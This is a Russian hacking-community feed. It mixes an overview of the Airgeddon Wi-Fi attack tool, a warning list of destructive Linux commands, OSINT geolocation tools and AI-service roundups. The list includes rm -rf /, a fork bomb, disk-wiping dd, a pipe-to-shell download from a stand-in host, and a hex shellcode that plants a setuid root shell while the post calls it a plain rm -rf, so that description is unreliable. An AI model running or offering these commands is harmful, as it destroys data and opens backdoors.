Сообщество - Life-Hack [Жизнь-Взлом]/Хакинг

Life-Hack [Жизнь-Взлом]/Хакинг

274 поста 2 805 подписчиков

Популярные теги в сообществе:

439

Airgeddon - многофункциональный инструмент для взлома Wi-Fi

Возможности Airgeddon:

▪Быстрое переключение между режимами работы адаптера.

▪DoS через беспроводные сети разными методами (mdk3, mdk4, aireplay-ng).

▪Полная поддержка диапазонов 2,4 ГГц и 5 ГГц.

▪Оптимизация захваченных файлов рукопожатий (Handshake).

▪Автономная расшифровка паролей в захваченных файлах WPA/WPA2 (Handshake и PMKID), с использованием словаря, брута и атак на основе правил, с помощью инструментов aircrack, crunch и hashcat.

Атаки Evil Twin (поддельная точка доступа)

▪Только режим Rogue/Fake AP для прослушивания с использованием внешнего анализатора (Hostapd + DHCP + DoS).

▪Простой встроенный сниффинг (Hostapd + DHCP + DoS + Ettercap).

▪Встроенный сниффинг, sslstrip2 (Hostapd + DHCP + DoS + Bettercap).

▪Интегрированный сниффинг, sslstrip2 и BeEF Browser Exploitation Framework (Hostapd + DHCP + DoS + Bettercap + BeEF).

▪Дополнительная подмена MAC-адреса для всех атак Evil Twin.

WPS-функции

▪WPS-сканирование.

▪Пользовательская ассоциация PIN-кода.

▪Атаки Pixie Dust.

▪Атаки методом перебора PIN-кода.

▪Атака с нулевым PIN-кодом (reaver).

▪Атака на известные PIN-коды WPS, основанная на онлайн-базе данных PIN-кодов.

▪Интеграция наиболее распространенных алгоритмов генерации PIN-кода (ComputePIN, EasyBox, Arcadyan и др.).

▪Генерация ПИН-кода в автономном режиме и возможность поиска цели в результатах ПИН-кода в базе данных.

▪Настраиваемые тайм-ауты для всех атак.

Атаки на корпоративные сети

▪Поддельная точка доступа, использующая «плавный» и «зашумленный» режимы, перехватывающая корпоративные хеши и простые пароли.

▪Создание сертификатов.

▪Атака WEP All-in-One (сочетание различных техник: Chop-Chop, Caffe Latte, ARP Replay, Hirte, Fragmentation, Fake Association и т. д.).

▪Совместимость со многими дистрибутивами Linux (см. раздел «Требования»).

▪Динамическое определение разрешения экрана и автоматический размер окон для оптимального просмотра.

▪Контролируемый выход. Очистка задач и временных файлов. Восстановление nftables/iptables после атаки, требующей внесения в них изменений. Возможность сохранить режим монитора при желании при выходе.

▪Многоязычная поддержка и функция автоматического определения языка ОС (см. раздел «Поддерживаемые языки»).

Подсказки меню, для удобства использования.

▪Автоматическое обновление. Скрипт проверяет наличие более новой версии, если это возможно.

▪Образ Docker для простого и быстрого развертывания контейнера. Можно использовать уже собранный образ на Docker Hub или собрать свой собственный.

▪Автоматическое определение HTTP-прокси для обновлений.

Поддерживается графическая система Wayland (не только система X Window).

▪Поддержка Tmux.

▪Полная совместимость с iptables и nftables с автоопределением и возможностью форсировать iptables путем установки опции.

▪Доступная система плагинов, позволяющая сообществу создавать свой собственный контент простым и гибким способом, используя созданную систему перехвата функций. Подробнее в разделе «Система плагинов».

Установка Airgeddon на Kali Linux

Airgeddon уже установлен в последних версиях Kali Linux. Если вы используете облегченную версию, то вот как его установить:

sudo apt-get install airgeddon

Приведенная выше команда запросит пароль root и права доступа к дисковому пространству. После этого будет установлен Airgeddon и некоторые зависимости.

Airgeddon также требует некоторых дополнительных инструментов. Для их установки выполните команду:

sudo apt install bettercap isc-dhcp-server hostapd hostapd-wpe udhcpd mdk4 hcxdumptool lighttpd hcxtools -y

Теперь, при наличии адаптера поддерживающего режим монитора и внедрение пакетов, можно начать использовать Airgeddon на Kali Linux.

Для взлома пароля WiFi можно использовать различные способы. Можно задействовать Airgeddon —> Offline WPA/WPA2 decrypt menu —> Personal > (aircrack + crunch) Bruteforce attack against Handshake/PMKID capture file или использовать aircrack-ng или онлайн-инструменты взлома хеша.

Информация предоставлена только в ознакомительных целях!

Мы в телеграме!

Показать полностью

Список опасных команд Linux

Командная строка Linux — очень продуктивная, полезная и интересная, но иногда она может быть очень опасной, особенно когда вы не уверены, что вы делаете. Для некоторых команд в командной строке вы должны перепроверить синтаксис дважды, прежде чем нажмёте Enter.

Команда rm -rf

Команда rm -rf — это один из самых быстрых способов удалить каталог и его содержимое. Но небольшая опечатка или незнание могут привести к непоправимому разрушению системы. Некоторые опции, используемые с командой rm.

rm в Linux используется для удаления файлов.

Команда rm -r удаляет каталог рекурсивно, даже если он непустой.

Команда rm -f удаляет файлы без запроса файлы ‘Только для чтения’.

rm -rf / : Принудительное удаление всего в корневой директории.

rm -rf * : Принудительное удаление всего в текущей/рабочей директории.

rm -rf . : Принудительное удаление всего в текущей директории и поддиректориях.

Следовательно, нужно быть осторожным, когда вы выполняете команду rm -rf. Чтобы обойти несчастные случаи с удалением файлов командой ‘rm‘, сделайте псевдоним (алиас) команды с параметром rm -i в файле “.bashrc”, после этого всегда будет появляться запрос при любому удалении.

Команда :(){ :|:& };:

В действительности эта команда является логической бомбой. Она оперирует определением функции с именем ‘:‘, которая вызывает сама себя дважды: один раз на переднем плане и один раз в фоне. Она продолжает своё выполнение снова и снова, пока система не зависнет.

:(){ :|:& };:

Команда > /dev/sda

Вышеприведённый пример пишет вывод «команды» в блок /dev/sda. Вышеприведённая команда пишет сырые данные и все файлы в блоке будут заменены сырыми данными, это станет причиной полной потери данных блока.

mv folder /dev/null

Команда mv переместит ‘folder‘ в /dev/null. В Linux /dev/null или null устройство — это специальный файл, который сбрасывает все данные, записанные в него, и сообщает, что операция записи прошла успешно.

# mv /home/user/* /dev/null

Вышеприведённая команда переместит всё содержимое пользовательских директорий user в /dev/null, что фактически является переносом всех данных в чёрную дыру (null).

wget http://malicious_source -O- | sh

Этот пример wget загрузит скрипт из вредоносного источника и выполнитего

mkfs.ext3 /dev/sda

Этот пример отформатирует ‘sda’. После выполнения данной команды ваш жёсткий диск будет помечен как «Новый». Вы останетесь без каких либо данных и с системой не подлежащей восстановлению.

> file

Эта команда используется для стирания текущего файла. Если эта команда будет выполнена с опечаткой или незнанием вроде “> xt.conf”, то это сотрёт конфигурационный или любой другой файл.

Это распространённая ошибка начинающих пользователей командной строки, когда они путают символы | (труба) и > (перенаправление вывода).

Например, вот так правильно:

echo 456 | grep -E '[0-9]'

А вот так вы затрёте бинарный файл:

echo 456 > grep -E '[0-9]'

^foo^bar

Эта команда используется для редактирования предыдущей запущенной команды без необходимости снова заново печатать всю команду. Это может быть действительно опасно.

dd if=/dev/random of=/dev/sda

Эта dd сотрёт блок устройства sda и заполнит его рандомным мусором. Система будет неработоспособной.

Скрытая команда

Команда ниже — это ничего более как rm -rf. Эта команда спрятана в шестнадцатеричную запись и пользователь может быть одурачен и запустить её. Запуск этого кода сотрёт ваш корневой раздел. Эта команда показывает здесь, что опасность может быть спрятана и иногда её трудно выявить.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p

release */

= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″

“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″

“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″

“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″

“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″

“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″

“\x6e\x2f\x73\x68\x00\x2d\x63\x00″

“cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;”;

Мы в телеграме!

Показать полностью

Находки в мире нейросетей и AI за эту неделю

Сервис Spline AI — создаем 3D-модели без знания соответствующих программ, есть бесплатный тариф. Получаем доступ через список ожидания.

PromptPal — бесплатный сервис для тех, кто хочет получать от ChatGPT лучший результат. В поиске ищем то, что вам нужно получить от ChatGPT, а сайт выдает готовый шаблон промта.

Inflection Pi — человечная версия ChatGPT, с которой можно поговорить в духе художественного фильма «Она».

Vimcal — календарь на стероидах и нейросетях, который синхронизируется с вашим календарем в смартфоне или почте. Сейчас можно получить ранний доступ через форму, просто напишите, что вы Team Lead или Marketing Director, проверять не будут.

Мы в телеграме, подписывайся.

26

Топ 5 сервисов для определения геолокации по фото

Сегодня мы решили немного рассказать вам о полезных OSINT-инструментах, которые тоже могут быть использованы в хакерских атаках, в которых есть место социальной инженерии.

Многие люди, как это ни странно в 2023 году, по-прежнему продолжают «чекиниться» и оставлять фотографии в социальных сетях с геолокацией, что, на наш взгляд, очень опрометчиво.

Вот 5 сервисов, которые определяют гео по фото в социальных сетях.

1. Huntintel —  сервис позволяет определить гео у постов в разных социальных сетях.

2. InstaHunt — бесплатный инструмент для Instagram.

3. BirdHunt — бесплатный инструмент для Twitter.

4. MetaData — сервис, который позволяет анализировать метаданные файлов, в том числе фото и картинок.

5. https://github.com/conflict-investigations/media-search-engi...  — сервис для поиска постов в социальных сетях по геолокации

Мы в телеграме, подписывайся!

Очередное шпионское ПО из Израиля Echo помогает властям следить за населением с помощью метаданных

Очередное шпионское ПО из Израиля Echo помогает властям следить за населением с помощью метаданных

«От своего «Эха» никуда не спрячешься», — говорится в маркетинговых материалах компании RayZone из Израиля, поставляющей властям технологии для слежки за людьми.

В отличии от других известных израильских продуктов для слежки, Echo не взламывает телефон жертвы, а использует массу метаданных, которые мы каждый день добровольно отдаем приложениям, сервисам и социальным сетям.

Представитель компании-разработчика сказал журналисту Bloomberg, пытавшемуся получить вразумительный комментарий, только то, что RayZone «предоставляет властям инструменты для борьбы с терроризмом и преступностью».

Помните, как в 2020-2021 во время ковид-истерии люди во всем мире озаботились своей приватностью в интернете? К слову, не зря. Вот только эта волна беспокойства закончилась, когда Apple и Facebook перерастали воевать между собой.

RayZone как раз из тех компаний, что используют данные из приложений для своих технологий. Например, собирают данные о местоположении пользователей.

Данные компания получает напрямую от брокеров данных, рекламных бирж и других игроков, торгующих цифровым следом пользователей.

Продукты RayZone уже приобрели правоохранители в Европе, на Ближнем востоке, Азии, а также Северной и Южной Америке.

#вредоносы

Life-Hack [Жизнь-Взлом]/Хакинг

Показать полностью

IOS или Android: Какую платформу выбрать?

Одно из самых популярных вопросов, с которым сталкиваются потребители и разработчики мобильных устройств, это выбор между iOS и Android. Обе платформы имеют свои преимущества и особенности, и в этом посте мы рассмотрим их, чтобы помочь вам принять решение.

Пользовательский интерфейс и опыт:

iOS, разработанная компанией Apple, известна своим интуитивно понятным и элегантным пользовательским интерфейсом. Устройства с iOS обладают схожими элементами дизайна, а платформа тесно интегрирована с другими продуктами Apple, такими как iCloud и Apple Watch. Android, разработанная Google, предлагает более гибкий пользовательский интерфейс с большим количеством настраиваемых опций. Опыт использования в Android может варьироваться в зависимости от производителя устройства и версии операционной системы.

Экосистема приложений:

Обе платформы имеют огромное количество приложений в своих магазинах приложений - App Store для iOS и Google Play для Android. Однако App Store обычно считается более строгим и кураторским в отношении публикации приложений, что гарантирует более высокое качество приложений в целом. Google Play имеет более открытый подход к публикации приложений, что может привести к большему разнообразию, но также может увеличить риск некачественных приложений.

Совместимость и обновления:

iOS имеет преимущество в области совместимости, так как новые версии операционной системы обычно доступны для большинства устройств Apple. Android, с другой стороны, сталкивается с проблемой фрагментации - различные производители выпускают устройства с разными версиями операционной системы, что может затруднить обновления и поддержку.

Приватность и безопасность:

Apple активно продвигает свою политику приватности и безопасности, утверждая, что данные пользователей должны быть защищены и контролируемыми. Android также предлагает функции безопасности и контроля приватности, но в связи с разнообразием производителей устройств, уровень безопасности может различаться. 

В конечном счете, выбор между iOS и Android зависит от ваших предпочтений, потребностей и ожиданий. iOS предлагает собственную экосистему и сильную интеграцию с продуктами Apple, в то время как Android предлагает большую гибкость и настраиваемость. Рекомендуется тщательно изучить обе платформы, чтобы принять информированное решение, и, возможно, попробовать устройства на обеих платформах, прежде чем сделать окончательный выбор.

Мы в телеграме, подписывайся!

Показать полностью
477

Топ-5 бесплатных российских нейросетей

1) «Шедеврум» от Яндекса - нейросеть с приятным интерфейсом генерирует изображения по запросу, пользователь может уточнить детали и задать стиль рисовки. Доступна для скачивания в Google Play и AppStore.

Ссылка: https://play.google.com/store/apps/details?id=com.yandex.she...

2)  «Kandinsky 2.1» от Сбера  - нейронка может миксовать ваши картинки, добавлять к ним детали и преобразовывать их. Можно задать стиль рисовки. Доступна на сайте, в голосовом помощнике "Салют" от Сбера, а также в телеграм-боте.

Ссылка: https://fusionbrain.ai/?ysclid=lg441pgtt5432813559

3) "SistemmaGPT" - отечественный аналог ChatGPT 3.5. Нейросеть доступна только  для бизнес-сегмента, однако в июне намечается релиз для простых пользователей.

Ссылка: https://sistemma.ru/login

4) «Балабоба» - нейросеть от Яндекса, которая может написать вам текст по ключевым словам с опорой на материалы из Интернета.

Ссылка: https://yandex.ru/lab/yalm

5) "GigaChat" - мультимодальная нейросеть от Сбера.  Умеет отвечать на вопросы, вести диалог, написать код, нарисовать картинку по запросу. И всё на русском языке. Сейчас закрытое бета-тестирование, ожидается релиз.

Ссылка : https://developers.sber.ru/portal/products/gigachat#be-the-f...

Мы в телеграме, подписывайся!

Топ 3 бесплатных инструментов работающих в России для создания и обучения нейронных сетей

Делимся с вами подборкой бесплатных нейросетей, которые работают и не заблокированы в России. Если вы увлечены искусственным интеллектом и интересуетесь его применением в различных областях, то эти инструменты обязательно понравятся вам.

TensorFlow - это открытая платформа глубокого обучения, разработанная командой Google. Она предлагает широкий спектр инструментов и библиотек для создания и обучения нейронных сетей. TensorFlow доступен бесплатно и не имеет ограничений в России. Он является одним из наиболее популярных фреймворков для разработки искусственного интеллекта.

PyTorch - это еще один популярный фреймворк глубокого обучения, который также доступен бесплатно и не заблокирован в России. Он разработан командой Facebook и предлагает удобный интерфейс для создания и обучения нейронных сетей. PyTorch также позволяет легко визуализировать и анализировать результаты обучения моделей.

Keras - это высокоуровневый фреймворк глубокого обучения, который является частью библиотеки TensorFlow. Он предлагает простой и интуитивно понятный интерфейс для создания нейронных сетей. Keras позволяет быстро прототипировать модели и имеет обширную документацию и сообщество пользователей.

Мы в телеграме!

Отличная работа, все прочитано!